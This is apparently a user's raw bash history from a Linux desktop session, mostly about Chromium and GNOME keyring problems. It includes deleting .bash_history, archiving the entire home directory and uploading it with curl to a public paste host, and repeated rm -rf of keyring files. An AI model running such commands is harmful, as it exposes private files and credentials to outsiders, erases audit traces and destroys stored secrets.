cat .bash_profile 
cat .bashrc
ls -la
rm .bash_history
tar -czf /tmp/userhomedir.tar.gz .
sudo systemctl restart gdm
curl --upload-file userhomedir.tar.gz https://paste.c-net.org
sudo su
cd .config/chromium
ls
nano flags.conf
nano flags.conf
rm flags.conf 
cd ..
ls
nano chromium-flags.conf
rm -rf ~/.local/share/keyrings/*
rm -rf ~/.local/share/keyrings/*
sudo killall gnome-keyring-daemon
rm -rf ~/.local/share/keyrings/*
chromium-browser
chromium
rm -rf ~/.local/share/keyrings/*
chromium --password-store=basic
sudo su
rm -rf ~/.local/share/keyrings/*
rm -rf ~/.local/share/keyrings/*
rm -rf ~/.local/share/keyrings/*
rm -rf ~/.local/share/keyrings/*
rm -rf ~/.local/share/keyrings/*
sudo systemctl restart gdm
